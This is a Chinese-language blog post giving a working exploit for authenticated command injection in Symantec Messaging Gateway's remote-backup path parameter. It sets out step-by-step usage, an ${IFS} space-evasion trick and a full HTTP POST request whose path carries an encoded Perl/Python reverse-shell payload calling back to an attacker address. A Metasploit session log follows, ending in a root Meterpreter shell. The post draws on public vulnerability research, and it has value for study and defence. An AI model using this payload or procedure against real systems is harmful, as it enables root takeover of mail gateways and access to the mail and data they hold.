AD

SymantecMessagingGateway_RCE

1、本机在127.0.0.1上监听41002端口,Symantec能够通过FTP或者SCP将备份文件存储到远程服务器上。由于这一过程通常耗时较长,因此他们决定通过后台任务方式执行这一过程,同时使用41002端口所对应的服务用来管理这类任务。
2、在前端可以通过下面的连接访问到备份配置页面
https://url/brightmail/admin/backup/backupNow.do
3、Web界面设置的参数最终会被bmagent服务所使用
4、存在如下参数规则:
验证过程使用了如下规则:
remoteBackupAddress不能为空。
remoteBackupAddress必须为可路由的IP地址。
端口(port)不能为空。
端口必须为有效的TCP和UDP端口。
路径(path)不能为空。
5、经过测试,可以通过path参数实现命令注入
6、POC使用流程:
使用有效凭证登陆应用。
转到“/brightmail/admin/backup/backupNow.do”。
选择“Store backup on a remote location”选项。
选择协议类型为SCP。
填入某个有效的SSH服务所对应的IP地址、端口信息。(你可以使用kali系统搭建这个服务)。
启用“Requires authentication”功能。
填入SSH服务所对应的用户名及密码信息。
将攻击载荷放在tmp参数上。不要忘了使用“$()”或者“``”,这样才能执行命令注入攻击。
路径必须是ASCII字符串。载荷中使用空格符(SPACE)会导致某些环节崩溃,你可以使用$IFS来替换空格符,${IFS}是Linux可以用的一个小技巧
7、POC:
POST /brightmail/admin/backup/performBackupNow.do HTTP/1.1
Host: 12.0.0.199:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1188
Referer: https://12.0.0.199:8443/brightmail/admin/backup/backupNow.do
Cookie: JSESSIONID=67376D92B987724ED2309C86990690E3; userLanguageCode=en; userCountryCode=US; navState=expanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded%2Cexpanded; JSESSIONID=0360B579A58BBBB8D74FEE4767BCAC10
Connection: close
Upgrade-Insecure-Requests: 1
pageReuseFor=backup_now&id=&symantec.brightmail.key.TOKEN=48f39f735f15fcaccd0aacc40b27a67bf76f2bb1&backupData=full&customType=configuration&includeIncidentMessages=true&includeReportData=true&includeLogData=true&backupTo=2&remoteBackupProtocol=SCP&remoteBackupAddress=127.0.0.1&remoteBackupPort=22&remoteBackupPath=tmp$(perl${IFS}-e${IFS}'system(pack(qq,H732,,qq,707974686f6e202d632022696d706f7274206261736536342c7379733b65786563286261736536342e6236346465636f6465287b323a7374722c333a6c616d62646120623a627974657328622c275554462d3827297d5b7379732e76657273696f6e5f696e666f5b305d5d28276157317762334a3049484e765932746c6443787a64484a315933514b637a317a62324e725a5851756332396a613256304b4449736332396a613256304c6c4e5051307466553152535255464e4b51707a4c6d4e76626d356c5933516f4b4363784d6934774c6a41754d5363734e4451304e436b70436d77396333527964574e304c6e56756347466a6179676e506b6b6e4c484d75636d566a646967304b536c624d46304b5a44317a4c6e4a6c5933596f62436b4b6432687062475567624756754b4751705047773643676c6b4b7a317a4c6e4a6c5933596f624331735a57346f5a436b70436d56345a574d6f5a4378374a334d6e4f6e4e394b516f3d2729292922,))')&requiresRemoteAuthentication=true&remoteBackupUsername=root&remoteBackupPassword=qwe123

8、MSF利用
msf > use exploit/linux/http/symantec_messaging_gateway_exec
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

REF:
https://github.com/rapid7/metasploit-framework/pull/8540
https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/
http://bobao.360.cn/learning/detail/3983.html





评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略